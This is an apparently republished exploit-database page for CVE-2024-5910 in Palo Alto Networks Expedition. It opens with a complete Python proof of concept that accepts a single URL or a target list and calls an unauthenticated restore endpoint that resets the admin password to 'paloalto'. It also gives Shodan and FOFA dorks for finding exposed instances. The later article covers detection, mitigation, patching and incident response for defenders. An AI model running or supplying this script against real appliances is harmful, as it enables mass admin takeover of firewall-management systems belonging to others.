Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover

Exploit Author: ByteHunter Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2025-04-06 
# Exploit Title: Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover
# Shodan Dork: html:"expedition project"                                                      #     
# FOFA Dork: "expedition project" && icon_hash="1499876150"                                   #
# Exploit Author: ByteHunter                                                                  #
# Email: 0xByteHunter@proton.me                                                               #
# Vulnerable Versions: 1.2 < 1.2.92                                                           #
# Tested on: 1.2.90.1 & 1.2.75                                                                #
# CVE : CVE-2024-5910                                                                         #                             
############################                                                                   #  
################################################################################################ 

import requests
import argparse
import warnings

from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter("ignore", InsecureRequestWarning)

ENDPOINT = '/OS/startup/restore/restoreAdmin.php'

def send_request(base_url):
    url = f"{base_url}{ENDPOINT}"
    print(f"Testing URL: {url}")  
    try:
        response = requests.get(url, verify=False, timeout=7) 
        if response.status_code == 200:
            print("✓ Admin password restored to: 'paloalto'\n")
            print("✓ admin panel is now accessable via ==> admin:paloalto creds")
        else:
            print(f"Request failed with status code: {response.status_code}\n")
    except requests.exceptions.RequestException as e:
        print(f"Error sending request to {url}") #{e}

def main():
    parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC')
    parser.add_argument('-u', '--url', type=str, help='single target URL')
    parser.add_argument('-l', '--list', type=str, help='URL target list')

    args = parser.parse_args()

    if args.url:
        send_request(args.url)
    elif args.list:
        try:
            with open(args.list, 'r') as file:
                urls = file.readlines()
                for base_url in urls:
                    send_request(base_url.strip())
        except FileNotFoundError:
            print(f"File not found: {args.list}")
    else:
        print("I need a URL address with -u or a URL file list with -l.")

if __name__ == '__main__':
    main()


Palo Alto Networks Expedition 1.2.90.1 — Admin Account Takeover (CVE-2024-5910)

This article explains the critical vulnerability tracked as CVE-2024-5910 that affects Palo Alto Networks Expedition appliances prior to the patched 1.2.92 release. It covers what the flaw is, the impact to organisations, defensive detection strategies, mitigations and recommended incident response steps. The focus is on actionable guidance for defenders and administrators — not on exploitation techniques.

Summary and Impact

  • Vulnerability: An administrative account reset vulnerability in Palo Alto Networks Expedition appliances (pre-1.2.92).
  • CVE: CVE-2024-5910
  • Affected versions: Expedition 1.2.x releases earlier than 1.2.92 (confirmed on 1.2.90.1 and 1.2.75)
  • Risk: High — successful exploitation can result in administrative account takeover (password reset to a known value), enabling immediate administrative access to the appliance.
  • Attack surface: Management interface and web-accessible appliance functionality. Network exposure of management services increases risk.

Because the vulnerability can be used to reset privileged credentials, impacted systems are at immediate and severe risk: attackers who reach the vulnerable interface can gain admin access and subsequently manipulate configurations, exfiltrate data, or move laterally into the environment.

Why this is dangerous

  • Administrative access provides full control over the appliance and any integrated workflows or configurations.
  • Expedition is deployed in environments that manage firewall policies and configurations — tampering can introduce long-lived persistence or blind spots.
  • Publicly exposed management interfaces and weak network segmentation increase likelihood of remote exploitation.

Defensive indicators and detection guidance

Defenders should search for signs of misuse or attempted exploitation. The following are practical, non-exploitative detection tactics you can run in your environment.

  • Review web access logs: Look for anomalous requests to administrative restore/management paths and sudden POST/GET requests from unusual source IPs. Prioritise requests to management endpoints originating from outside expected administrative networks.
  • Check authentication logs: Identify unexpected admin logins, particularly right after suspicious web access attempts. Note source IPs, timestamps and user-agents.
  • Watch for credential changes: Alerts for password resets, creation of new admin users, or changes in authentication configuration should be investigated immediately.
  • File and configuration integrity: Compare current appliance configuration files against known good baselines. Unexpected changes may indicate compromise.
  • Network-level telemetry: Use IDS/IPS and web-proxy logs to flag management interface traffic from untrusted networks.

Example (defensive) log search patterns to find related web hits — run in a read-only manner on your logging server:

# Search web server or proxy logs for likely management endpoint access (example pattern)
grep -i "restoreAdmin" /var/log/httpd/*access_log* /var/log/nginx/*access.log*

Explanation: The command above searches logs for occurrences of the string "restoreAdmin", which is an indicator of requests targeting the administrative restore functionality. Adjust paths and patterns based on your logging architecture and appliance logging outputs.

Immediate mitigations (short-term)

If you operate Expedition instances and cannot immediately apply the vendor patch, apply the following containment controls to reduce exposure:

  • Network restrictions: Block public access to management ports and the appliance web UI using firewall rules or network ACLs. Limit management access to a small set of trusted IPs or an administrative jump host.
  • Isolate impacted hosts: If you suspect compromise, disconnect the appliance from networks where possible and place it in a monitored, isolated VLAN.
  • Change credentials: After investigation and ensuring no active malicious control, rotate all administrative credentials and API keys associated with the appliance. Ensure new passwords are strong and unique.
  • Enable multi-factor authentication (MFA): Where supported, require MFA for administrative access to reduce the value of credential theft.
  • Monitoring & alerting: Add real-time alerts for admin logins, password resets, and configuration changes.

Long-term remediation: patching and configuration

  • Apply vendor fixes: Upgrade Expedition to the fixed version (1.2.92 or later) as soon as vendor patches are available and validated in your environment.
  • Harden management plane: Place management interfaces on dedicated management networks, restrict access via VPN or bastion hosts, and use strict ACLs.
  • Principle of least privilege: Limit administrative accounts and use role-based access controls. Avoid widespread use of a single shared admin account.
  • Logging and retention: Ensure appliance and network logs are centralized and retained long enough to investigate incidents.
  • Configuration backups and integrity: Maintain secure, versioned backups of configuration with integrity checks to allow recovery and forensic comparison.

Incident response checklist

  • Detect: Correlate web logs, authentication events, and configuration changes around the suspected timeframe.
  • Contain: Restrict network access to the appliance and revoke exposed credentials.
  • Eradicate: Apply the vendor patch; remove any unauthorized accounts or scheduled tasks introduced by an attacker.
  • Recover: Restore known-good configuration from backups if integrity is in doubt, and revalidate administrative access controls.
  • Post-incident: Perform a root cause analysis, report to stakeholders, and implement additional controls (MFA, monitoring, segmentation).

Risk mitigation examples

Control Purpose Notes
Network access control Limit who can reach management interface Use IP allowlists, VPN-only access, and restrict to admin subnets
Patch management Remove known vulnerability Test and deploy vendor-supplied 1.2.92+ update
MFA for admins Defend against credential misuse Prefer hardware or app-based MFA
Centralized logging Faster detection and forensic capability Include appliance logs and network gateway traffic

Coordination and responsible disclosure

If you discover evidence of exploitation, coordinate internally with your incident response team and, where appropriate, notify Palo Alto Networks support to obtain vendor guidance and patches. Follow legal and organisational policies around breach reporting and third-party disclosure.

Final recommendations for administrators

  • Prioritise patching Expedition appliances to the vendor-released fixed version (>= 1.2.92).
  • Assume internet-exposed management interfaces are high-risk and treat them accordingly.
  • Implement layered controls: network segmentation, MFA, least privilege, and centralized monitoring.
  • Practice incident response tabletop exercises that include compromise of management appliances to improve readiness.